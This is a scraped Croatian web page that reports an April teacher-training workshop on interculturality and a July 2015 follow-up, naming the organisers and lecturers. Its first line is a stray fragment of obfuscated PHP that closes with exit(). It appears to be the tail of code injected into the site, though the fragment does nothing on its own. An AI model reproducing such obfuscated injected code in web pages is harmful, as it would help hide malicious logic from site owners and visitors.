header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

U suradnji sa Agencijom za obrazovanje organizirana je 27. travnja edukacija za nastavnike u srednjim školama na temu “Interkulturalnost”.

Ciljevi edukacije bili su: steći temeljne interkulturalne kompetencije, usvajati interkulturalne stavove, znanja i vještine - bolje razumijevati i poštivati različite kulture, usvajati djelotvorno ponašanje u drugim kulturama – razvijati interkulturalna osjetljivost, te razvijati i proširivati osobno znanje i komunikacijsku kompetenciju u radu s kulturno drugačijim učenicima.

Edukacija se odvijala kroz rad u pedagoškim radionicama, rad u iskustvenim skupinama, vježbe, rasprave, a predavači su bili Amalija Krstanović, pedagoginja, Monika Šimek, psihologinja, Zehra Delić, učiteljica razredne

nastave, te Ivana Milas, koordinatorica programa edukacije Nansen dijalog centra. Nakon ove radionice održana je follow up radionica 01. srpnja 2015.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak